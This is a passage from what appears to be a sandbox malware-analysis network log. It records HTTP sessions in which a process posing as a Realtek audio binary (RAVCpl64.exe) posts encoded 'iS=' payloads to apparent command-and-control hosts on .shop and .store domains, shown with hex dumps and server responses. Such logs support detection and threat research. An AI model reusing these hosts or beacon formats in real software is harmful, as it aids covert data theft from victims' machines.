                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.zkdamdjj.shop
                                                                                                                                                                              Origin: http://www.zkdamdjj.shop
                                                                                                                                                                              Referer: http://www.zkdamdjj.shop/swhs/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 78 7a 33 56 47 6e 4e 36 59 4a 49 2b 70 68 34 2b 4a 66 4b 55 55 49 43 75 43 41 31 32 39 4b 62 72 6a 41 62 6d 32 2b 71 2b 2f 47 59 59 71 41 72 53 6f 67 37 52 35 74 4a 51 54 71 72 6a 38 6f 6a 48 78 52 36 43 4b 68 34 37 42 63 50 4d 68 69 51 4b 43 68 6a 59 66 6c 6f 39 64 41 44 78 47 2f 6d 4c 62 30 6c 54 63 50 33 74 65 30 54 75 6d 70 57 52 5a 42 4f 69 72 36 70 34 7a 61 4c 4b 76 35 6b 4c 68 4d 4d 48 70 6a 52 5a 67 2f 68 6c 5a 38 30 36 75 4a 44 35 59 45 56 77 6f 42 68 37 41 51 77 39 6b 63 4f 58 69 65 31 77 72 4c 35 6a 55 44 5a 65 73 75 56 4f 6f 39 33 61 2b 64 59 6f 67 46 4f 39 67 79 75 47 43 74 50 79 63 78 37 57 57 68 77 54 63 63 52 58 6b 6c 34 3d
                                                                                                                                                                              Data Ascii: iS=xz3VGnN6YJI+ph4+JfKUUICuCA129KbrjAbm2+q+/GYYqArSog7R5tJQTqrj8ojHxR6CKh47BcPMhiQKChjYflo9dADxG/mLb0lTcP3te0TumpWRZBOir6p4zaLKv5kLhMMHpjRZg/hlZ806uJD5YEVwoBh7AQw9kcOXie1wrL5jUDZesuVOo93a+dYogFO9gyuGCtPycx7WWhwTccRXkl4=


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              35192.168.11.2049793104.21.40.167806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:57:08.693780899 CET2578OUTPOST /swhs/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 7367
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.zkdamdjj.shop
                                                                                                                                                                              Origin: http://www.zkdamdjj.shop
                                                                                                                                                                              Referer: http://www.zkdamdjj.shop/swhs/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 78 7a 33 56 47 6e 4e 36 59 4a 49 2b 70 68 34 2b 4a 66 4b 55 55 49 43 75 43 41 31 32 39 4b 62 72 6a 41 62 6d 32 2b 71 2b 2f 41 41 59 71 78 4c 53 70 44 44 52 34 74 4a 51 4d 61 72 69 38 6f 6a 61 78 52 53 47 4b 68 39 4d 42 65 48 4d 68 41 59 4b 4c 31 33 59 49 31 6f 39 56 67 44 79 59 50 6e 52 62 30 56 58 63 50 6e 74 65 30 54 75 6d 71 4f 52 64 51 4f 69 74 36 70 35 77 61 4c 47 72 35 6b 76 68 4e 6c 38 70 6a 56 6a 67 4d 5a 6c 63 73 6b 36 69 62 72 35 46 30 56 79 72 42 68 6a 41 51 74 6a 6b 64 6a 6b 69 66 42 57 72 4a 5a 6a 51 6d 77 65 75 65 42 75 71 2f 48 4c 35 63 42 65 6f 44 57 50 6c 6c 76 79 47 62 57 53 63 6e 6a 68 56 79 49 76 5a 63 68 38 39 6a 48 46 4f 64 52 55 6f 6b 48 70 51 77 65 50 6e 32 51 4e 4f 75 54 49 79 69 67 50 69 65 72 63 42 78 47 76 31 49 38 66 34 57 56 63 49 74 6d 41 68 31 71 77 53 67 63 65 4a 67 77 48 5a 54 45 4e 55 4a 46 78 71 72 45 2f 43 66 37 30 46 75 56 6a 4b 43 4b 34 72 59 48 6c 62 2f 51 35 30 76 57 39 2f 46 67 31 6c 65 68 45 38 37 50 31 31 71 42 51 32 71 69 4e 55 36 52 74 46 57 49 [TRUNCATED]
                                                                                                                                                                              Data Ascii: iS=xz3VGnN6YJI+ph4+JfKUUICuCA129KbrjAbm2+q+/AAYqxLSpDDR4tJQMari8ojaxRSGKh9MBeHMhAYKL13YI1o9VgDyYPnRb0VXcPnte0TumqORdQOit6p5waLGr5kvhNl8pjVjgMZlcsk6ibr5F0VyrBhjAQtjkdjkifBWrJZjQmweueBuq/HL5cBeoDWPllvyGbWScnjhVyIvZch89jHFOdRUokHpQwePn2QNOuTIyigPiercBxGv1I8f4WVcItmAh1qwSgceJgwHZTENUJFxqrE/Cf70FuVjKCK4rYHlb/Q50vW9/Fg1lehE87P11qBQ2qiNU6RtFWIvs0qnLAhRv/UwnbmIv6aQQyOkIRprXXAFXKwY3RpuP2hfCggffupE+dGb9MMJ0aMxFjAFivTYLHLgT+xal2iMKEwOqA/2OE+pD+qYacIpQPJC8EfU7VM/T0oWicWIif5/6ryNXhbvg5XdBbjBBZVMK8JaI2J/iAry8U697JlktQ9QjOWgAo5+AnazpQWEwsnrpC1eJJe77MPPhAu1FHfrkCZ5PcU7MV7fdJ180S2P5ZXuLnNl8Wc6aW7GY8fFgl3ApGk0tFeyuul2vPqWHvJgVP8Zf89FvAUfzZ5v8RLImQo1meBhzc8qSTGAOZJ3n2KXIdzlZfS21cm6hXF4KTOXDi523B499Hmc7R4K8sqxAkNqgBDxQnltNMAOT7BX+mtpT2/LGz9iUZtX9VZ7I4G4806jmxYR9fwAuyqevGpiM/Mtagl5Ar0B0MeDQthevF8vIhr52Zrb3rOAFQahKD7tkdX1+2eQO2KEAfSjZn1ayemJvi5Kmk912wZF5kVNIo6KgoEcn9bDfEp55TczA9Hs/xmsZ/JUk58L3oLYBHxW0+vXS0rNSoqMqh5Nb+kV5FAVjDx2KpKry+++Yg+whRBh7tf8R0mzWquQfpzSHzTkw6GzJAV8niTn0zBXCoGwEprLUr1i+XH4vi/VR/Eo6MEQNJadTiSzPpMgI [TRUNCATED]
                                                                                                                                                                              Jan 11, 2025 03:57:08.693861961 CET5349OUTData Raw: 6b 39 74 4c 32 7a 54 78 45 57 53 4b 52 31 4c 73 4d 58 59 6f 54 74 35 4d 6f 65 2b 41 7a 57 41 6f 6f 51 79 51 65 35 79 6c 54 49 79 4a 43 70 54 79 45 72 68 69 53 2b 41 55 79 48 67 53 39 33 49 47 53 32 34 49 32 74 33 2f 57 43 6f 71 59 78 74 42 73 42
                                                                                                                                                                              Data Ascii: k9tL2zTxEWSKR1LsMXYoTt5Moe+AzWAooQyQe5ylTIyJCpTyErhiS+AUyHgS93IGS24I2t3/WCoqYxtBsB278gmApWWMVtULDX/hR3EzPzMGj9BqDikvPG9Vn25gOE3qLNFeo1uSDfCmG9WuHlKbW4OQoFDlvbM0NSDDvH/2uSs2obnIL8G0Tzp77ZZBC7TPfxfjaUdrcNoByw0fs5pnL05OrSohomsPk1shP90Bp6cBNcgfYU+


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              36192.168.11.2049794104.21.40.167806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:57:11.332329035 CET488OUTGET /swhs/?iS=8xf1FTtyUpYkrTYMR7SiSpjuEkVK44/qllrz0dKQmws7hy/+lCnqv8AjCvT/8dHN8wn+YkpcLfbwvxo0J0bTV1ZiQxCgHPOqTWlPXofsQEz+qrXGThT4v9Q=&Bi=zJ_w6yPG HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.zkdamdjj.shop
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Jan 11, 2025 03:57:50.188285112 CET972INHTTP/1.1 522
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:57:50 GMT
                                                                                                                                                                              Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                              Content-Length: 15
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iTl117fc0a1ApkeG7%2BZBhOgkRni%2Bs9D3fQddI6iNDTuKpXblVR%2FVeIAdGxHs3a4EO0TzldAk%2BMdttO6s5dhcXIbTaT3KNMVkAsBkal3sVO4FuS910%2Fe3Xa5f2vBowUwU%2B99Wbg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                              Referrer-Policy: same-origin
                                                                                                                                                                              Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                              Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 9001a34e3b48638d-ORD
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=118976&min_rtt=118976&rtt_var=59488&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=488&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                              Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32
                                                                                                                                                                              Data Ascii: error code: 522


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              37192.168.11.2049795172.67.167.146806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:57:55.465972900 CET770OUTPOST /8gp4/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.rgenerousrs.store
                                                                                                                                                                              Origin: http://www.rgenerousrs.store
                                                                                                                                                                              Referer: http://www.rgenerousrs.store/8gp4/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 49 47 32 35 56 54 46 35 52 72 45 44 67 52 4d 2f 37 79 53 54 38 2b 49 37 67 35 48 68 56 4f 68 4c 79 62 38 45 31 2b 77 52 59 51 42 7a 2b 44 59 41 4d 76 65 77 71 32 6f 48 78 34 38 4a 67 73 46 48 49 36 4f 6b 30 37 72 69 50 69 6b 57 70 33 65 54 39 4b 65 38 48 6c 76 55 4f 6e 70 71 78 52 78 65 45 4c 44 58 34 30 56 6d 41 7a 63 4f 61 65 2b 65 66 6a 46 57 67 38 53 79 66 6b 42 35 39 57 59 6e 54 70 71 47 4d 44 63 48 39 41 68 77 62 74 57 65 71 61 76 79 35 42 35 42 78 2f 74 74 5a 36 35 53 33 35 35 73 34 4a 53 70 54 73 4c 6c 38 68 44 6d 34 38 77 55 33 6e 55 52 4c 51 34 49 59 34 4b 41 53 77 3d 3d
                                                                                                                                                                              Data Ascii: iS=IG25VTF5RrEDgRM/7yST8+I7g5HhVOhLyb8E1+wRYQBz+DYAMvewq2oHx48JgsFHI6Ok07riPikWp3eT9Ke8HlvUOnpqxRxeELDX40VmAzcOae+efjFWg8SyfkB59WYnTpqGMDcH9AhwbtWeqavy5B5Bx/ttZ65S355s4JSpTsLl8hDm48wU3nURLQ4IY4KASw==
                                                                                                                                                                              Jan 11, 2025 03:57:55.925916910 CET1091INHTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:57:55 GMT
                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EYmiU9Dxu3yTj8B5mHLeSbT2AkWZiQJ4dtoPRBl865L33twk4SHBuhtzsMBWiH8CaKcATtNz3s3keh%2FasViOvT3ALRIPhXbkq1PWYxdOqRPLdiHYxwdcamOfV3nkZyp5SZltlyAemvk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 9001a46209a61158-ORD
                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=118571&min_rtt=118571&rtt_var=59285&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=770&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                              Data Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff e3 02 00 db 2a cd 17 19 01 00 00 0d 0a
                                                                                                                                                                              Data Ascii: f0LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8*
                                                                                                                                                                              Jan 11, 2025 03:57:55.925949097 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              38192.168.11.2049796172.67.167.146806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:57:58.120737076 CET790OUTPOST /8gp4/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.rgenerousrs.store
                                                                                                                                                                              Origin: http://www.rgenerousrs.store
                                                                                                                                                                              Referer: http://www.rgenerousrs.store/8gp4/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 49 47 32 35 56 54 46 35 52 72 45 44 68 78 38 2f 33 79 75 54 36 65 49 34 76 5a 48 68 63 75 68 50 79 62 77 45 31 2f 46 61 5a 69 56 7a 2b 6d 6b 41 64 62 79 77 74 32 6f 48 70 49 38 49 2b 63 46 36 49 36 44 62 30 37 6e 69 50 69 77 57 70 79 61 54 39 38 57 2f 47 31 76 53 46 48 70 30 73 68 78 65 45 4c 44 58 34 30 52 41 41 7a 30 4f 5a 76 4f 65 63 42 74 56 38 73 53 39 50 55 42 35 35 57 59 5a 54 70 71 77 4d 43 42 61 39 43 5a 77 62 73 6d 65 71 4c 76 7a 7a 42 35 48 31 2f 73 48 66 50 55 2b 38 62 52 66 35 70 75 70 65 39 7a 47 35 33 4f 38 6c 4f 45 77 30 30 49 6a 50 67 42 67 61 36 4c 62 50 39 54 52 6a 4f 32 72 66 45 67 6e 79 6c 42 6c 30 75 66 65 42 33 38 3d
                                                                                                                                                                              Data Ascii: iS=IG25VTF5RrEDhx8/3yuT6eI4vZHhcuhPybwE1/FaZiVz+mkAdbywt2oHpI8I+cF6I6Db07niPiwWpyaT98W/G1vSFHp0shxeELDX40RAAz0OZvOecBtV8sS9PUB55WYZTpqwMCBa9CZwbsmeqLvzzB5H1/sHfPU+8bRf5pupe9zG53O8lOEw00IjPgBga6LbP9TRjO2rfEgnylBl0ufeB38=
                                                                                                                                                                              Jan 11, 2025 03:57:58.584578037 CET1100INHTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:57:58 GMT
                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uh%2FLeOLc6e8Q3Q%2BS%2B7dEpqZgh8UFls5DGNy7twG04FsspAG7uHdyHarxgfOKS%2FftPBp2T%2FP6yzZyvFfc%2BUNEt6XlM1%2BofxJzPEcD%2BRFfAizSb%2BuZuk9D0E3ET70F1hP%2BWBtkp4K%2BKKA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 9001a472a8a122db-ORD
                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=119763&min_rtt=119763&rtt_var=59881&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=790&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                              Data Raw: 65 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff 0d 0a
                                                                                                                                                                              Data Ascii: e5LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8
                                                                                                                                                                              Jan 11, 2025 03:57:58.584588051 CET16INData Raw: 62 0d 0a e3 02 00 db 2a cd 17 19 01 00 00 0d 0a
                                                                                                                                                                              Data Ascii: b*
                                                                                                                                                                              Jan 11, 2025 03:57:58.584825039 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              39192.168.11.2049797172.67.167.146806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:58:00.776454926 CET2578OUTPOST /8gp4/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 7367
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.rgenerousrs.store
                                                                                                                                                                              Origin: http://www.rgenerousrs.store
                                                                                                                                                                              Referer: http://www.rgenerousrs.store/8gp4/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 49 47 32 35 56 54 46 35 52 72 45 44 68 78 38 2f 33 79 75 54 36 65 49 34 76 5a 48 68 63 75 68 50 79 62 77 45 31 2f 46 61 5a 69 4e 7a 2b 51 77 41 50 4b 79 77 73 32 6f 48 33 34 38 4e 2b 63 46 72 49 2b 76 66 30 37 36 58 50 67 49 57 34 6b 6d 54 74 4a 32 2f 4d 31 76 53 4b 6e 70 31 78 52 77 63 45 4b 7a 54 34 30 42 41 41 7a 30 4f 5a 74 47 65 4c 44 46 56 76 63 53 79 66 6b 42 31 39 57 59 69 54 70 79 67 4d 43 55 74 68 69 35 77 59 4d 32 65 76 35 33 7a 37 42 35 46 79 2f 73 66 66 50 51 68 38 61 39 39 35 6f 71 48 65 2b 44 47 35 47 79 72 2b 4e 6f 6f 33 30 78 70 4f 52 31 46 62 4b 48 52 50 4f 48 32 69 6f 36 46 5a 67 45 6f 37 32 56 6b 6d 4c 44 2b 44 41 4f 62 4d 74 6b 48 30 71 6e 50 68 4c 32 78 43 6b 43 61 30 6f 47 64 6b 70 64 69 46 37 75 33 48 4f 35 6c 49 78 4f 79 78 73 32 70 63 77 78 48 55 72 67 32 6c 73 34 71 6f 74 61 65 30 45 59 71 42 77 43 6a 30 31 7a 43 65 2b 63 32 75 66 61 77 6a 63 56 38 65 55 52 48 4b 41 4f 54 4b 43 50 6a 4d 38 72 66 53 61 45 78 68 55 73 78 48 61 2b 70 78 32 70 34 77 42 79 69 2b 69 6f [TRUNCATED]
                                                                                                                                                                              Data Ascii: iS=IG25VTF5RrEDhx8/3yuT6eI4vZHhcuhPybwE1/FaZiNz+QwAPKyws2oH348N+cFrI+vf076XPgIW4kmTtJ2/M1vSKnp1xRwcEKzT40BAAz0OZtGeLDFVvcSyfkB19WYiTpygMCUthi5wYM2ev53z7B5Fy/sffPQh8a995oqHe+DG5Gyr+Noo30xpOR1FbKHRPOH2io6FZgEo72VkmLD+DAObMtkH0qnPhL2xCkCa0oGdkpdiF7u3HO5lIxOyxs2pcwxHUrg2ls4qotae0EYqBwCj01zCe+c2ufawjcV8eURHKAOTKCPjM8rfSaExhUsxHa+px2p4wByi+io06KxyJ0l0ZfX6fVos4z0C+9lTwUl4Lwbr77/ds84ffg7YlETMJW9ZqnUhfrPOoHATm60VH8kbq/plV/0V6/oSEdUieim88XbrEcE6KVHSmOGij6kVqsK81ULrMoI6E6vIjFr2e12TfTZCvck7QUqAFDQcPgD/tvWS8dostxxthitCu+kQrEsseJgwdACPwXbUeqHEZ+/0W8nuiUTxIXZ+O7oYdAovl7XnwC06z0xMBMb/vHC4ys8B9ZLyNPWwLy8kgAXt5QV+5S8hqk2LUyRnTkhoXGQfer6Y6v2e+1QaeWDHI6XzIMSGAeCFwq4GZHFSHcVZMPdtKVF+5Acd6xJD47hT6i2Ke3VIkfLwjM2sgmWlh1MKkUqIuB7QLz/Nt0u4NNU/gA/oUxd+l2PJLyEnyRSs7jPksfxjTOjf8Uey/w3cX6j56u1dPDhTJA3FjHyWhjgAlagDLbj2Ds96+AMpcBC+0NuhlFWppVVbPdN98YP2xyLxR6Suy2jdzE6uUiuLbg/701+uPIwntrzS7w7n9zr1ktsxMzwoJAXEiobJU6DuLOVHsx2yZIjNLEkZMum8uk3YXTmehsStc5sn64B/DkiDt8EPD/mH/NMG2MWz4USbWDsmQ3X6f0XtojFnEZ0KKsd5pNRdMSj0jlz6Nggt0EO3b9CkxnLQ3 [TRUNCATED]
                                                                                                                                                                              Jan 11, 2025 03:58:00.776480913 CET3867OUTData Raw: 6c 62 68 4f 6c 43 2b 48 57 7a 57 6d 74 61 62 51 53 30 31 77 5a 4e 6c 35 4f 4e 39 55 47 7a 46 47 76 30 4c 53 6b 31 41 72 42 4b 46 47 72 79 50 79 72 6e 7a 4c 38 31 30 53 37 6d 52 48 48 6e 2f 59 48 6e 50 79 78 72 66 4f 65 73 55 30 52 74 39 39 35 43
                                                                                                                                                                              Data Ascii: lbhOlC+HWzWmtabQS01wZNl5ON9UGzFGv0LSk1ArBKFGryPyrnzL810S7mRHHn/YHnPyxrfOesU0Rt995CqFez1ZA7eii6i7a7kopx5NP/CLUycFClUN45ywASUpMOtBjKu82xY1erj5xyN/Uei9+Qz8VBbbfTgUjyY5G1iKhgoLE3y8lwqf9CYDcne1X0eWj1QejYZAEK4LAMnpx0qLvQ22cF5n/FO0tUiP/zmH2guEqhhAjWJ
                                                                                                                                                                              Jan 11, 2025 03:58:00.776557922 CET1494OUTData Raw: 4e 71 6c 67 36 78 61 5a 53 37 45 64 32 6d 66 61 58 37 61 4d 54 76 45 49 34 4d 50 48 32 2f 6b 52 62 52 52 67 50 35 36 45 39 32 38 34 67 4d 65 73 6e 74 32 4a 44 50 70 6b 7a 72 30 54 31 64 58 49 69 43 69 51 73 36 34 46 77 4d 33 53 37 44 2b 46 43 31
                                                                                                                                                                              Data Ascii: Nqlg6xaZS7Ed2mfaX7aMTvEI4MPH2/kRbRRgP56E9284gMesnt2JDPpkzr0T1dXIiCiQs64FwM3S7D+FC1w2oxaI6SP/6XiElq+1s9hTBfqaaLD2AGjKZBZNYSYnTF8BHjxgq8RGduYi0s/werovHyvWOUK80Y3cidWJEKF9IHzdFRc2K+C+56ZO4Lr/IhyLwEUmPdlCC9waPr6DlGhUWckVhGA0raRkdKVt1wAT5++AUAvS0q8
                                                                                                                                                                              Jan 11, 2025 03:58:01.255726099 CET1089INHTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:58:01 GMT
                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9yqNhHrpSWpeskuJROlau%2BAGbyKdKjoeqGANb2o9L8LJMJF1zujC%2BtgNt3nEzTUpe7TLHagzbAL2UjoP%2F%2BpjJWSae6TTI0On7sAOLHErAvOz0aDNM%2Fynqh7gdjoDrcR6rtYnrBYi24Y%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 9001a4833d5a1141-ORD
                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=118462&min_rtt=118462&rtt_var=59231&sent=5&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7939&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
